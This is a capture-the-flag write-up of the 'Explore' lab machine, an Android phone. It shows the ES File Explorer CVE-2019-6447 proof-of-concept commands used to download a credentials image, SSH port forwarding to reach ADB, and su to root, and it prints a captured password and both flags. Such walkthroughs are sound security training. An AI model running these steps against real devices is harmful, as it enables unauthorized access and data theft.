Name: | Explore |
---|---|
Release Date: | 26 Jun 2021 |
Retire Date: | 30 Oct 2021 |
OS: | Linux |
Base Points: | Easy - Retired [0] |
Rated Difficulty: | |
Radar Graph: | |
JoshSH 00 days, 00 hours, 03 mins, 27 seconds | |
jkr 00 days, 00 hours, 18 mins, 56 seconds | |
Creator: | bertolis |
Pentest Workstation PDF: | Explore.pdf |
Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.247
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
Mirai
We have SSH (TCP 2222), FREECIV/ADB (TCP 5555), and HTTP Bukkit JSONAPI (TCP 59777) that are the major ports that we need to look at right now. Gobuster found several pages and directories that could be interesting.
gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.247:59777
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ gobuster dir -u http://10.10.10.247:59777 -w /usr/share/dirb/wordlists/big.txt -o gobusterExplore.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.247:59777
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/17 08:41:32 Starting gobuster in directory enumeration mode
===============================================================
/acct (Status: 301) [Size: 65] [--> /acct/]
/bin (Status: 301) [Size: 63] [--> /bin/]
/cache (Status: 301) [Size: 67] [--> /cache/]
/config (Status: 301) [Size: 69] [--> /config/]
/d (Status: 301) [Size: 59] [--> /d/]
/data (Status: 301) [Size: 65] [--> /data/]
/dev (Status: 301) [Size: 63] [--> /dev/]
/etc (Status: 301) [Size: 63] [--> /etc/]
/init (Status: 403) [Size: 31]
/lib (Status: 301) [Size: 63] [--> /lib/]
/mnt (Status: 301) [Size: 63] [--> /mnt/]
/oem (Status: 301) [Size: 63] [--> /oem/]
/proc (Status: 301) [Size: 65] [--> /proc/]
/product (Status: 301) [Size: 71] [--> /product/]
/sbin (Status: 301) [Size: 65] [--> /sbin/]
/storage (Status: 301) [Size: 71] [--> /storage/]
/sys (Status: 301) [Size: 63] [--> /sys/]
/system (Status: 301) [Size: 69] [--> /system/]
/vendor (Status: 301) [Size: 69] [--> /vendor/]
===============================================================
2022/01/17 08:56:26 Finished
===============================================================
Researching 5555 and 59777, we can discover ES File Explorer and it's information and vulnerabilities. Two great resources for those two ports are:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
Clone the exploit repo and check the README.md file to see what commands can be run. To save time, the one we need is:
python3 poc.py --ip=10.10.10.247 -c listPics then
python3 poc.py --ip=10.10.10.247 -g /storage/emulated/0/DCIM/creds.jpg
Open the creds.jpg file and you'll have Kristi's login credentials. Apparently, having a picture of the quintessential "post-it note" is better than just the post-it note..... (PASSWORD MANAGERS!!! I'm better now). At least it's a halfway decent password, so there's that.
Kristi:Kr1sT!5h@Rp3xPl0r3!
This is obviously a phone, in case the ES File Explore wasn't clear :D Now we have to figure out how to escalate to the phone's version of root (which if I recall is still root). The problem is that normal Linux enumeration scripts aren't going to work correctly AND we still have to find the user.txt flag. Time to go old school manual. After searching the file system, I found a few things. First, there's an SD card in this phone and the user flag is on it!
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
Now, if you recall port 5555 ADB was filtered, but what if we could utilize port tunneling to access it?
ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222
Then, we "should" be able to use adb connect to get another shell, hopefully as root, but we'll see.
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb devices
List of devices attached
emulator-5554 device
localhost:5555 device
Notice there are two "devices" attached. We need to specify which one we want adb to connect to the shell on.
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb -s localhost:5555 shell 1 ⨯
x86_64:/ $ whoami
shell
x86_64:/ $ su
:/ # whoami
root
Gotcha!!! Now we search for root.txt and this phone will be toast.
:/ # find / -name root.txt
:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5
This was a completely different style of box/phone/thing.... But hey, another one down!